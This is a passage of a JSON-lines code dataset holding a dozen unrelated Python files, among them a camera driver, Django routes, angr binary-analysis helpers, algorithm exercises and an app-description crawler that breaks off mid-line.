self.calcolaGuadagno(self.getProdottiVendutiInData())\n self.tendenzaCategorie = self.tendenzaCategorie()\n self.salvataggioStatitiche()\n\n # Metodo che appende la satistica creata e salva tutte le statistiche nel database\n def salvataggioStatitiche(self):\n fileName = PathDatabase().statisticheTxt\n file = File()\n listStatistiche = file.deserializza(fileName)\n listStatistiche.append(self)\n file.serializza(fileName, listStatistiche)\n\n # Metodo che cerca tra le statistiche dsponibili e trova la più recente, ritorna None se non ci sono statistiche\n def trovaUltimeStatistiche(self):\n fileName = PathDatabase().statisticheTxt\n file = File()\n listStatistiche = file.deserializza(fileName)\n if len(listStatistiche) == 0: return None\n statistica = None\n ultimaData = listStatistiche[0].data\n for stats in listStatistiche:\n if stats.data >= ultimaData:\n statistica = stats\n return statistica\n\n # Metodo per vedere quanti clienti proprietari sono registrati\n def getNumeroClienti(self):\n listClienti = Account().recuperaListaOggetti()\n numeroClienti = len(listClienti)\n return numeroClienti\n\n # Metodo che prende la lista dei prodotti venduti\n def getListProdottiVenduti(self):\n listVenduti = Prodotto().recuperaListaProdottiVenduti()\n return listVenduti\n\n # Metodo che calcola l'ammontare complessivo dei prodotti passati tramite listProdotti\n # listProdotti = lista dei prodotti\n def calcolaGuadagno(self, listProdotti):\n totale = 0\n for prodotto in listProdotti:\n totale += int(prodotto.prezzoCorrente)\n return totale\n\n # Metodo che prende la lista dei prodotti venduti nelle 24 ore anticedenti\n def getProdottiVendutiInData(self):\n listVenduti = self.getListProdottiVenduti()\n dataFiltro = datetime.datetime.today() - relativedelta(days=1)\n lista = list()\n for prodotto in listVenduti:\n if prodotto.dataEsposizione >= dataFiltro:\n lista.append(prodotto)\n return lista\n\n # Metodo che prende le categorie con tendenza maggiore e le restituisce come un dizionario\n # listProdotti = lista di prodotti da cui calcolare la repitizione delle loro categorie(tendenza)\n def tendenzaCategorie(self):\n listCategorie = Categoria().recuperaListaOggetti()\n for obj in listCategorie:\n if obj.oggettiTotali > self.numeroTerzaCategoriaTendenza \\\n and obj.oggettiTotali > self.numeroSecondaCategoriaTendenza \\\n and obj.oggettiTotali > self.numeroPrimaCategoriaTendenza:\n self.numeroPrimaCategoriaTendenza = obj.oggettiTotali\n self.nomePrimaCategoriaTendenza = obj.nome\n elif obj.oggettiTotali > self.numeroTerzaCategoriaTendenza \\\n and obj.oggettiTotali > self.numeroSecondaCategoriaTendenza \\\n and obj.oggettiTotali < self.numeroPrimaCategoriaTendenza:\n self.numeroSecondaCategoriaTendenza = obj.oggettiTotali\n self.nomeSecondaCategoriaTendenza = obj.nome\n elif obj.oggettiTotali > self.numeroTerzaCategoriaTendenza \\\n and obj.oggettiTotali < self.numeroSecondaCategoriaTendenza \\\n and obj.oggettiTotali < self.numeroPrimaCategoriaTendenza:\n self.numeroTerzaCategoriaTendenza = obj.oggettiTotali\n self.nomeTerzaCategoriaTendenza = obj.nome\n return listCategorie\n\n # Metodo che passata una lista di categorie trova la lista con piu oggetti\n def maxOggettiCategoria(self, lista):\n massimo = 0\n for ogg in lista:\n if ogg.oggettiTotali > massimo:\n massimo = ogg.oggettiTotali\n return massimo\n\n # Metodo che prende il numeroDiChiavi con valore piu alto\n # return dizionario con le categorie di tendenenza\n def topKeysInDict(self, dict):\n lista = list()\n for obj in sorted(dict, key=dict.get, reverse=False):\n lista.append(obj)\n return lista\n\n # Metodo che viene richiamato dall'Amministratore per la visualizzazione delle statistiche.\n # Esegue una lettura nel database di tutte le statistiche presenti e le restituisce come lista,\n # la lista verra' trasmessa alla WIEW per la visualizzazione grafica\n def visualizzaStatistiche(self):\n fileName = PathDatabase().statisticheTxt\n file = File()\n listStatistiche = file.deserializza(fileName)\n return listStatistiche\n\n # Metodo che rimuove le statistiche con la stessa data nello stesso giorno per non creare inconsistenza\n def rimuoviStatsConData(self):\n todayDate = datetime.datetime.today().date()\n lista = self.visualizzaStatistiche()\n if len(lista) == 0 or lista == None: return\n for stats in lista:\n statsDate = stats.data.date()\n if statsDate == todayDate:\n lista.pop(lista.index(stats))\n File().serializza(PathDatabase().statisticheTxt, lista)\n","repo_name":"LeonUrsu/NegozioDellUsato-ExamIS","sub_path":"UsatoBeatoFiles/UsatoBeatoPython/MVC/model/SistemService/Statistiche.py","file_name":"Statistiche.py","file_ext":"py","file_size_in_byte":6648,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43126510798","text":"# https://swexpertacademy.com/main/learn/course/subjectDetail.do?courseId=AVuPDN86AAXw5UW6&subjectId=AWOVFCzaqeUDFAWg\n\nimport sys\nsys.stdin = open (\"/Users/yuyeong/Desktop/1일 1코딩/2022.08.26/sw_전기버스.txt\")\n\nt = int(input())\nfor tc in range(1, t+1):\n k, n, m = map(int, input().split())\n num_b = list(map(int, input().split()))\n\n loc = 0 # 현재 위치\n char = 0 # 충전 횟수\n\n # 현재 위치 + 충전 후 이동할 수 있는 정류장 수 \n while loc + k < n:\n # 최대 기동 가능한 거리내에 충전소가 있는지 확인\n for i in range(k, 0, -1):\n if(loc + i) in num_b:\n # 충전소가 있을 경우 현재 위치에 더해 줌 \n loc += i\n # 충전 횟수 증가\n char += 1\n break\n # 최대 이동 거리 내에 충전소가 없는 경우 \n else:\n # 충전소 횟수 0\n char = 0\n break\n print('#{} {}'.format(tc, char))\n ","repo_name":"nevertheless0404/Study_slowly","sub_path":"2022.08.26/sw_전기버스.py","file_name":"sw_전기버스.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7316141349","text":"import atexit\nimport cv2\nimport numpy as np\nimport traitlets\nfrom pymba import Vimba, VimbaException, Frame\n\ndef bgr8_to_jpeg(value, quality=75):\n return bytes(cv2.imencode('.jpg', value)[1])\n\nclass AVTCamera(traitlets.HasTraits):\n # global vimba and vimba cameras group\n vimba = None\n cameras = None\n\n value = traitlets.Any()\n width = traitlets.Integer(default_value=224)\n height = traitlets.Integer(default_value=224)\n format = traitlets.Unicode(default_value='bgr8') # the format is fixed now\n running = traitlets.Bool(default_value=False)\n\n capture_fps = traitlets.Integer(default_value=10) # wait to support it later\n capture_width = traitlets.Integer(default_value=640)\n capture_height = traitlets.Integer(default_value=480) \n capture_device = traitlets.Integer(default_value=0)\n\n def __init__(self, *args, **kwargs):\n super(AVTCamera, self).__init__(*args, **kwargs)\n self.curCam = None\n self._running = False\n self.AcqMode = 'Unknown'\n if self.format == 'bgr8':\n self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)\n\n self.init_vimba()\n self.init_cam()\n self.getFrame()\n\n #atexit.register(self.release_vimba)\n atexit.register(self.release_cam)\n\n\n @traitlets.observe('running')\n def _on_streaming(self, change):\n # change is running status here\n if change['new'] and not change['old']:\n # transition from not running -> running\n self._running = True\n try:\n self.curCam.disarm()\n self.curCam.arm('Continuous', self.frame_callback)\n self.AcqMode = 'Continuous'\n self.curCam.start_frame_acquisition()\n except VimbaException as e:\n print(e)\n raise RuntimeError('Camera start Continuous running failure !!!')\n elif change['old'] and not change['new']:\n # transition from running -> not running\n self._running = False\n self.curCam.disarm()\n self.AcqMode = 'Unknown'\n\n\n def frame_callback(self, frame: Frame) -> None:\n type, image_8bit = self.convertFrame(frame)\n image = self.fillUserFrame(type, image_8bit)\n self.value = cv2.resize(image, (int(self.width), int(self.height)))\n #print(\"avt frame_callback\")\n\n\n def fillUserFrame(self, type, frame):\n PIXEL_FORMATS_RGB_CONVERSIONS = {\n 'BayerRG8': cv2.COLOR_BAYER_RG2RGB,\n }\n PIXEL_FORMATS_BGR_CONVERSIONS = {\n 'BayerRG8': cv2.COLOR_BAYER_RG2BGR,\n 'BayerGR8': cv2.COLOR_BAYER_GR2BGR,\n 'BayerRG12': cv2.COLOR_BAYER_RG2BGR,\n 'BayerRG12Packed': cv2.COLOR_BAYER_RG2BGR,\n 'BayerGR12Packed': cv2.COLOR_BAYER_GR2BGR,\n 'Mono8': cv2.COLOR_GRAY2BGR,\n 'Mono10': cv2.COLOR_GRAY2BGR,\n 'Mono12': cv2.COLOR_GRAY2BGR,\n 'Mono14': cv2.COLOR_GRAY2BGR,\n 'RGB8Packed': cv2.COLOR_RGB2BGR\n }\n\n if self.format == 'bgr8':\n if (type == \"BGR8Packed\"):\n img = frame\n else:\n img = cv2.cvtColor(frame, PIXEL_FORMATS_BGR_CONVERSIONS[type])\n return img\n\n def convertFrame(self, frame):\n camera_frame_size = len(frame.buffer_data())\n frame_pixel_format = frame.pixel_format\n Width = self.capture_width\n Height = self.capture_height\n #print(\"Resolution: %dx%d, FrameSize: %d, PixelFormat: %s\" %(Width, Height, camera_frame_size, frame_pixel_format))\n data_bytes = frame.buffer_data()\n if (frame_pixel_format == \"Mono8\" or frame_pixel_format == \"BayerRG8\" or frame_pixel_format == \"BayerGR8\"):\n frame_8bits = np.ndarray(buffer=data_bytes, dtype=np.uint8, shape=(Height, Width))\n elif (frame_pixel_format == \"BayerRG12\" or frame_pixel_format == \"Mono10\" or frame_pixel_format == \"Mono12\" or frame_pixel_format == \"Mono14\"):\n data_bytes = np.frombuffer(data_bytes, dtype=np.uint8)\n pixel_even = data_bytes[0::2]\n pixel_odd = data_bytes[1::2]\n # Convert bayer16 to bayer8 / Convert Mono12/Mono14 to Mono8\n if (frame_pixel_format == \"Mono14\"):\n pixel_even = np.right_shift(pixel_even, 6)\n pixel_odd = np.left_shift(pixel_odd, 2)\n elif (frame_pixel_format == \"Mono10\"):\n pixel_even = np.right_shift(pixel_even, 2)\n pixel_odd = np.left_shift(pixel_odd, 6)\n else:\n pixel_even = np.right_shift(pixel_even, 4)\n pixel_odd = np.left_shift(pixel_odd, 4)\n frame_8bits = np.bitwise_or(pixel_even, pixel_odd).reshape(Height, Width)\n elif (frame_pixel_format == \"BayerRG12Packed\" or frame_pixel_format == \"Mono12Packed\" or frame_pixel_format == \"BayerGR12Packed\"):\n data_bytes = np.frombuffer(data_bytes, dtype=np.uint8)\n size = len(data_bytes)\n index = []\n for i in range(0, size, 3):\n index.append(i + 1)\n data_bytes = np.delete(data_bytes, index)\n frame_8bits = data_bytes.reshape(Height, Width)\n elif (frame_pixel_format == \"RGB8Packed\" or frame_pixel_format == \"BGR8Packed\"):\n frame_8bits = np.ndarray(buffer=frame.buffer_data(), dtype=np.uint8, shape=(Height, Width * 3))\n else:\n # Note: wait to do -- other format, such as YUV411Packed, YUV422Packed, YUV444Packed\n frame_8bits = np.ndarray(buffer=frame.buffer_data(), dtype=np.uint8, shape=(Height, Width))\n raise RuntimeError('Unsupported image format, please re-configurate the camera!!!')\n return frame_pixel_format, frame_8bits\n\n def _read(self):\n type, image_8bit = self.getFrame()\n image = self.fillUserFrame(type, image_8bit)\n image_resized = cv2.resize(image, (int(self.width), int(self.height)))\n return image_resized\n\n def read(self):\n if self._running:\n raise RuntimeError('Cannot read directly while camera is running')\n self.value = self._read()\n return self.value\n\n def getFrame(self):\n if self._running:\n raise RuntimeError('Cannot read directly while camera is running')\n else:\n try:\n if self.AcqMode is not 'SingleFrame':\n self.curCam.arm('SingleFrame')\n self.AcqMode = 'SingleFrame'\n raw_frame = self.curCam.acquire_frame()\n type, frame = self.convertFrame(raw_frame)\n except VimbaException as e:\n print(e)\n raise RuntimeError(\"acquire_frame error\")\n return type, frame\n\n def _setROI(self):\n try:\n feature_h = self.curCam.feature(\"Height\")\n feature_h.value = self.capture_height\n feature_w = self.curCam.feature(\"Width\")\n feature_w.value = self.capture_width\n except:\n raise RuntimeError(\"Wrong capture_height/capture_width !!'acquire_frame'!\")\n\n def init_cam(self):\n vmFactory = AVTCamera.vimba.camera_ids()\n # Get connected cameras\n AVTCamera.cameras = [AVTCamera.vimba.camera(id) for id in vmFactory]\n cam_nums = len(AVTCamera.cameras);\n if cam_nums == 0:\n raise RuntimeError(\"Warning: No camera present.\")\n elif self.capture_device >= cam_nums:\n raise RuntimeError(\"Warning: No specified camera.\")\n else:\n self.curCam = AVTCamera.cameras[self.capture_device]\n try:\n self.curCam.open()\n self._setROI()\n self.curCam.arm('SingleFrame')\n self.AcqMode = 'SingleFrame'\n print(\"Device {} open OK\".format(self.capture_device))\n except VimbaException as e:\n print(e)\n raise RuntimeError(\"init_cam camera error\")\n\n\n def release_cam(self):\n if self.curCam:\n print(\"Release: Device {} ID: {}\".format(self.capture_device, self.curCam))\n self.curCam.disarm()\n self.curCam.close()\n\n def init_vimba(self):\n if AVTCamera.vimba == None:\n AVTCamera.vimba = Vimba()\n AVTCamera.vimba.startup()\n print (\"init_vimba\")\n\n def release_vimba(self):\n if AVTCamera.vimba:\n AVTCamera.vimba.shutdown()\n AVTCamera.vimba = None\n print (\"Exit: release_vimba\")","repo_name":"SunnyAVT/avtcam","sub_path":"avtcam/avt_camera.py","file_name":"avt_camera.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73486522612","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis file contains all the locations of the icons used.\nIt also contains the positions of these icons on the E-Paper display\n\"\"\"\n\nfrom PIL import Image\nim_open = Image.open\nimport os\n\npath = os.path.dirname(os.path.abspath(__file__)).replace(\"\\\\\", \"/\")\nif path != \"\" and path[-1] != \"/\":\n path += \"/\"\n\nwpath = path+'weather-icons/'\ndpath = path+'days/'\nopath = path+'other/'\nfpath = path+'fonts/'\n\nNotoSansCJK = 'NotoSansCJK/NotoSansCJKsc-'\nNotoSans = 'NotoSans/NotoSans-SemiCondensed'\nweather_font = 'WeatherFont/weathericons-regular-webfont.ttf'\n\nweekday = im_open(opath+'weekday.png')\neventicon = im_open(opath+'event.png')\ndateicon = im_open(opath+'today.png')\nseperator = im_open(opath+'seperator.jpeg')\nseperator2 = im_open(opath+'seperator2.jpeg')\nblack = im_open(opath+'black.jpeg')\nwhite = im_open(opath+'white.jpeg')\nred = im_open(opath+'red.jpeg')\n\nwiconplace = (0, 0)\ntempplace = (299, 0)\nhumplace = (299, 35)\nseperatorplace = (0, 72)\nmonthplace = (0, 74)\nweekplace = (3, 134)\nwindiconspace = (79, 0)\nsunriseplace = (214, 0)\nsunsetplace = (214, 35)\n\n\ncol = 0\nagenda_view_lines = {\n 'line1': (col, 75), 'line2': (col, 100),\n 'line3': (col, 125), 'line4': (col, 150),\n 'line5': (col, 175), 'line6': (col, 200),\n 'line7': (col, 225), 'line8': (col, 250),\n 'line9': (col, 275), 'line10': (col, 300),\n 'line11': (col, 325), 'line12': (col, 350),\n 'line13': (col, 375), 'line14': (col, 400),\n 'line15': (col, 425), 'line16': (col, 450),\n 'line17': (col, 475), 'line18': (col, 500),\n 'line19': (col, 525), 'line20': (col, 550),\n 'line21': (col, 575), 'line22': (col, 600),\n }\n\nrss_places = {\n 'line_1' : (0, 490), 'line_2' : (0, 515), 'line_3' : (0, 540),\n 'line_4' : (0, 565), 'line_5' : (0, 590), 'line_6' : (0, 615)\n }\n\ne_col = 70\ndate_col = 0\n\ne_row_1 = 490\ne_row_2 = 515\ne_row_3 = 540\ne_row_4 = 565\ne_row_5 = 590\ne_row_6 = 615\n\nevent_positions = {\n 'e1': (e_col, e_row_1), 'e2': (e_col, e_row_2), 'e3': (e_col, e_row_3),\n 'e4': (e_col, e_row_4), 'e5': (e_col, e_row_5), 'e6': (e_col, e_row_6)\n }\n\ndate_positions = {\n 'd1': (date_col, e_row_1), 'd2': (date_col, e_row_2),\n 'd3': (date_col, e_row_3), 'd4': (date_col, e_row_4),\n 'd5': (date_col, e_row_5), 'd6': (date_col, e_row_6)\n }\n\ncol1 = 3\ncol2 = 57\ncol3 = 111\ncol4 = 165\ncol5 = 219\ncol6 = 273\ncol7 = 327\n\nrow1 = 162\nrow2 = 225\nrow3 = 288\nrow4 = 351\nrow5 = 414\nrow6 = 477\n\npositions = {\n 'a1': (col1, row1), 'a2': (col2, row1), 'a3': (col3, row1), 'a4': (col4, row1),\n 'a5': (col5, row1), 'a6': (col6, row1), 'a7': (col7, row1),\n\n 'b1': (col1, row2), 'b2': (col2, row2), 'b3': (col3, row2), 'b4': (col4, row2),\n 'b5': (col5, row2), 'b6': (col6, row2), 'b7': (col7, row2),\n\n 'c1': (col1, row3), 'c2': (col2, row3), 'c3': (col3, row3), 'c4': (col4, row3),\n 'c5': (col5, row3), 'c6': (col6, row3), 'c7': (col7, row3),\n\n 'd1': (col1, row4), 'd2': (col2, row4), 'd3': (col3, row4), 'd4': (col4, row4),\n 'd5': (col5, row4), 'd6': (col6, row4), 'd7': (col7, row4),\n\n 'e1': (col1, row5), 'e2': (col2, row5), 'e3': (col3, row5), 'e4': (col4, row5),\n 'e5': (col5, row5), 'e6': (col6, row5), 'e7': (col7, row5),\n\n 'f1': (col1, row6), 'f2': (col2, row6), 'f3': (col3, row6), 'f4': (col4, row6),\n 'f5': (col5, row6), 'f6': (col6, row6), 'f7': (col7, row6)\n }\n\nweek_row = 134\n\nweekday_pos = {\n 'pos0': (col1, week_row), 'pos1': (col2, week_row), 'pos2': (col3, week_row),\n 'pos3': (col4, week_row), 'pos4': (col5, week_row), 'pos5': (col6, week_row),\n 'pos6': (col7, week_row)\n }\n\nweathericons = {\n '01d': '\\uf00d', '02d': '\\uf002', '03d': '\\uf013',\n '04d': '\\uf012', '09d': '\\uf01a', '10d': '\\uf019',\n '11d': '\\uf01e', '13d': '\\uf01b', '50d': '\\uf014',\n '01n': '\\uf02e', '02n': '\\uf013', '03n': '\\uf013',\n '04n': '\\uf013', '09n': '\\uf037', '10n': '\\uf036',\n '11n': '\\uf03b', '13n': '\\uf038', '50n': '\\uf023'\n }\n","repo_name":"lemariva/ePaperWidgets","sub_path":"display/image_data.py","file_name":"image_data.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"10308072329","text":"import openpyxl\r\nimport pandas as pd\r\nfrom collections import defaultdict\r\nd = defaultdict(list)\r\n\r\n\r\ntable = openpyxl.load_workbook(filename=\"FEREKS.xlsx\")\r\nsheet = table.active\r\ntable_row = sheet.max_row\r\n\r\nobj_table1 = pd.read_excel('FEREKS.xlsx', header=None, usecols='A,B')\r\ndfs = []\r\n\r\n\r\nfor i in range(0,table_row):\r\n sample = obj_table1[27 * i + 1: 27 * (i + 1)]\r\n dfs.append(sample)\r\nprint(dfs)\r\nret = pd.concat(dfs)\r\nret_list = ret.values.tolist()\r\nfor h, n in ret_list:\r\n d[h].append(n)\r\ndf = pd.DataFrame([d])\r\ndf.to_excel(\"1.xlsx\")\r\nprint(d)\r\n\r\n","repo_name":"Sallamander-Zerg/exel_sort","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71800750453","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login', views.login_view, name='login'),\n path('logout', views.logout_view, name='logout'),\n path('register', views.register, name='register'),\n path('auction/create', views.auction_create, name='auction_create'),\n path('auction/active', views.active_auctions_view, name='active_auctions_view'),\n path('auction/active/<str:category_name>', views.active_auctions_view, name='active_auctions_view'),\n path('auction/watchlist', views.watchlist_view, name='watchlist_view'),\n path('auction/watchlist/<int:auction_id>/edit/<str:reverse_method>', views.watchlist_edit, name='watchlist_edit'),\n path('auction/<str:auction_id>', views.auction_details_view, name='auction_details_view'),\n path('auction/<str:auction_id>/bid', views.auction_bid, name='auction_bid'),\n path('auction/<str:auction_id>/close', views.auction_close, name='auction_close'),\n path('auction/<str:auction_id>/comment', views.auction_comment, name='auction_comment'),\n path('categories/<str:category_name>', views.category_details_view, name='category_details_view'),\n]\n","repo_name":"BobsProgrammingAcademy/ecommerce-auction-website","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"23639645074","text":"import angr\n\nfrom angr.analyses.reaching_definitions.dep_graph import DepGraph\nfrom angr.calling_conventions import SimStackArg, SimRegArg\nfrom angr.engines.light import SpOffset\nfrom angr.knowledge_plugins.key_definitions import LiveDefinitions\n\n\ndef get_arg_defs(arch, livedefs, arg_ix):\n cc = angr.DEFAULT_CC[arch.name](arch)\n arg_loc = cc.arg_locs(is_fp=[False] * (arg_ix + 1))[arg_ix]\n\n if isinstance(arg_loc, SimRegArg):\n reg_offset = arch.registers[arg_loc.reg_name][0]\n arg_defs = livedefs.register_definitions.get_objects_by_offset(reg_offset)\n elif isinstance(arg_loc, SimStackArg):\n arg_defs = livedefs.stack_definitions.get_objects_by_offset(livedefs.get_sp().offset + arg_loc.stack_offset)\n else:\n raise ValueError(\"\")\n\n return arg_defs\n\ndef search_functions(functions, q, match_case=True, exact_match=False):\n matches = []\n q_lower = q\n if not match_case:\n q_lower = q.lower()\n\n for func in functions.values():\n is_match = func.name == q_lower or func.demangled_name == q_lower\n if not exact_match and not is_match:\n is_match = (q in func.name or q in func.demangled_name) or \\\n not match_case and (q_lower in func.name.lower() or q_lower in func.demangled_name.lower())\n\n if is_match:\n matches.append(func)\n\n return matches\n\n\ndef rda_with_dep_graph(p, *args, **kwargs):\n return p.analyses.ReachingDefinitions(*args, dep_graph=DepGraph(), **kwargs)\n\n\ndef get_arg_reg_offset(p, arg_ix):\n cc = angr.DEFAULT_CC[p.arch.name]\n r = cc.ARG_REGS[arg_ix]\n return p.arch.registers[r][0]\n\n\ndef get_ordered_arg_reg_offsets(p):\n cc = angr.DEFAULT_CC[p.arch.name]\n return [p.arch.registers[r][0] for r in cc.ARG_REGS]\n\n\ndef get_function_call_sites_and_targets(p, f):\n functions = p.kb.functions\n\n call_sites = {}\n for cs in f.get_call_sites():\n ct_addr = f.get_call_target(cs)\n call_sites[cs] = functions.get_by_addr(ct_addr)\n\n return call_sites\n\n\ndef load_string_from_memory(p, addr, load_size=128):\n try:\n string_bytes = p.loader.memory.load(addr, load_size)\n except KeyError as e:\n return None\n\n if 0 in string_bytes:\n zix = string_bytes.find(0)\n if zix < 2:\n string_bytes = string_bytes[:string_bytes.find(0, zix)]\n else:\n string_bytes = string_bytes[:zix]\n\n return string_bytes.decode('utf-8', errors='backslashreplace')\n\n\ndef find_call_in_callgraph(p, f, addr=None, name=None, max_depth=3):\n callsites = {}\n _find_call_in_callgraph(p, f, addr, name, max_depth, callsites)\n return callsites\n\n\ndef _find_call_in_callgraph(p, f, addr, name, max_depth, callsites):\n if max_depth <= 0:\n return\n\n current_callsites = get_function_call_sites_and_targets(p, f)\n for cs, ct in current_callsites.items():\n if (addr and ct.addr == addr) or (name and ct.demangled_name == name) or (addr is None and name is None):\n callsites[cs] = ct\n else:\n _find_call_in_callgraph(p, ct, addr, name, max_depth-1, callsites)\n\n# def dominates()\n\n","repo_name":"mounir-khaled/SAUSAGE","sub_path":"binary_socket_analyzer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"6490101527","text":"from datetime import datetime\nfrom .convertions import unpack_value_t, cmap_to_dict, ctimewithns_to_time\n\n\nclass NamespaceElement:\n def __init__(self, value, name, description):\n self.value = value\n self.name = name\n self.description = description\n\n @classmethod\n def unpack_from_ne_struct(cls, nm_element_struct):\n return cls(\n nm_element_struct.value.decode(encoding=\"utf-8\"),\n nm_element_struct.name.decode(encoding=\"utf-8\"),\n nm_element_struct.description.decode(encoding=\"utf-8\"),\n )\n\n def is_dynamic(self) -> bool:\n return bool(not self.name)\n\n\nclass Namespace:\n def __init__(self, namespace_elements, length, string):\n self.length = length\n self.namespace_elements = namespace_elements\n self.string = string\n\n @classmethod\n def unpack_from_nm_struct(cls, namespace_struct):\n _length = namespace_struct.length\n _str = namespace_struct.string.decode(encoding=\"utf-8\")\n elements = namespace_struct.elements\n _ne_arr = []\n for i in range(_length):\n _el = NamespaceElement.unpack_from_ne_struct(elements[i])\n _ne_arr.append(_el)\n return cls(_ne_arr, _length, _str)\n\n def __repr__(self):\n return self.string\n\n def __iter__(self):\n for element in self.namespace_elements:\n yield element\n\n def __len__(self) -> int:\n return len(self.namespace_elements)\n\n def __getitem__(self, index: int) -> NamespaceElement:\n return self.namespace_elements[index]\n\n\nclass Metric:\n def __init__(\n self,\n namespace=\"\",\n description=\"\",\n value=\"\",\n value_type=None,\n timestamp=\"\",\n tags=\"\",\n ):\n self.namespace = namespace\n self.description = description\n\n self.value = value\n self.unit = value_type\n self.timestamp = timestamp\n self.tags = tags\n\n def _tags_to_str(self) -> str:\n all_tags = \"\"\n if self.tags:\n for k, v in self.tags.items():\n _tags = \":\".join([str(k), str(v)])\n all_tags = \" \".join([all_tags, _tags])\n return all_tags\n\n def __repr__(self) -> str:\n _repr = \"{} {} {} {} {}\".format(\n self.namespace,\n self.unit,\n self.value,\n self.description,\n datetime.utcfromtimestamp(self.timestamp),\n )\n tags = self._tags_to_str()\n _repr = \" \".join([_repr, tags])\n return _repr\n\n @classmethod\n def unpack_from_metric_struct(cls, mt_struct):\n _namespace = Namespace.unpack_from_nm_struct(mt_struct.namespace.contents)\n _desc = mt_struct.description.decode(encoding=\"utf-8\")\n _value, _unit = unpack_value_t(mt_struct.value)\n _time = ctimewithns_to_time(mt_struct.timestamp)\n _tags = cmap_to_dict(mt_struct.tags)\n return cls(\n _namespace,\n _desc,\n _value,\n _unit,\n _time,\n _tags,\n )\n","repo_name":"solarwinds/snap-plugin-lib","sub_path":"v2/bindings/python/swisnap_plugin_lib_py/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1659539406","text":"import collections\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\n\ndef bfs():\n cnt = 0\n steps = 0\n q = collections.deque()\n q.append((P, 0))\n while q:\n pos, step = q.popleft()\n if visit[pos] == 1:\n continue\n else:\n if pos <= S:\n cnt += 1\n steps += step\n if cnt == 2:\n return steps\n visit[pos] = 1\n\n for v in graph[pos]:\n q.append((v, step+1))\n\n\nN, S, P = map(int, input().split())\ngraph = [[] for _ in range(N+1)]\nvisit = [0]*(N+1)\nfor _ in range(N-1):\n A, B = map(int, input().split())\n graph[A].append(B)\n graph[B].append(A)\n\nans = N - bfs() - 1\nprint(ans)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"윤효전/210826/21738.py","file_name":"21738.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"43873948728","text":"f = open(\"26.txt\")\ncubes = []\nfor i in f:\n size, color = i.split()\n size = int(size)\n cubes.append([size, color])\ncubes.sort(reverse=1)\n\nsklad = []\nwhile len(cubes) > 0:\n block = [cubes.pop(0)]\n for i in range(len(cubes)):\n if cubes[i][1] != block[-1][1] and block[-1][0] - cubes[i][0] >= 5:\n block.append(cubes[i])\n cubes[i] = \"\"\n cubes = [x for x in cubes if x != \"\"]\n sklad.append(block)\nprint(max(len(x) for x in sklad), len(sklad))\n","repo_name":"foblako/Statgrad2","sub_path":"26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31131967663","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 9 15:48:17 2013\n\nIt should work. Some parts of code need to be rewritten in a more pythonic way.\nIt takes up to 8 minutes to download 1997 descriptions. It takes 2 more minutes\nto build the Inverted Index and 3 more minutes to build the Doc Weight Matrix.\n\nI'm using the most popular app in the US to avoid having descriptions with\noriental characters. Let me know what do you think. If there is too much\n\"black magic\" just ask me any question.\n\nC ya :-)\n\n@author: Seby\n\"\"\"\n\nfrom __future__ import division, print_function\nimport sys\nimport os\nimport nltk, re, pprint, math, operator, time, threading, urllib2\nfrom os.path import dirname, join\nfrom itertools import chain\n\ndef map_async(function, args, threads=10):\n\t'''\n\tSimulates built-in `map` function. Each call is asynchronous\n\tusing thread pool with variable number of thread\n\t'''\n\tdef wrap():\n\t\twhile(1):\n\t\t\ttry:\n\t\t\t\tlock.acquire()\n\t\t\t\tparam = args_copy.pop()\n\t\t\texcept:\n\t\t\t\treturn\n\t\t\tfinally:\n\t\t\t\tlock.release()\n\n\t\t\ttry:\n\t\t\t\tresult = function(param)\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\treturn\n\n\t\t\ttry:\n\t\t\t\tlock.acquire()\n\t\t\t\tparam = res.append(result)\n\t\t\texcept:\n\t\t\t\treturn\n\t\t\tfinally:\n\t\t\t\tlock.release()\n\n\tlock = threading.Lock()\n\targs_copy = list(args)\n\tthreads = [threading.Thread(target=wrap) for i in range(threads)]\n\tres = []\n\n\tfor thread in threads: thread.start()\n\tfor thread in threads: thread.join()\n\n\treturn res\n\n\n#==============================================================================\n# Step1: App crawling\n# You will access the app websites such as Google Play (https://play.google.com\n# /store) and AppBrain (http://www.appbrain.com/) to obtain the desired\n# description texts for the apps. Thereis no constraint on which kind of\n# apps you choose. The number of apps should not be less than\n# 1000. Store the description text in the files.\n#==============================================================================\n\ncategories = [\n\"business\",\n\"comics\",\n\"communication\",\n\"education\",\n\"entertainment\",\n\"finance\",\n\"health-and-fitness\",\n\"medical\",\n\"sports\"\n]\n\nROOT = join(dirname(__file__), \"apps-descs\")\n\n#==============================================================================\n# Open a web page\n#==============================================================================\n\ndef open_web_page(url):\n\topener = 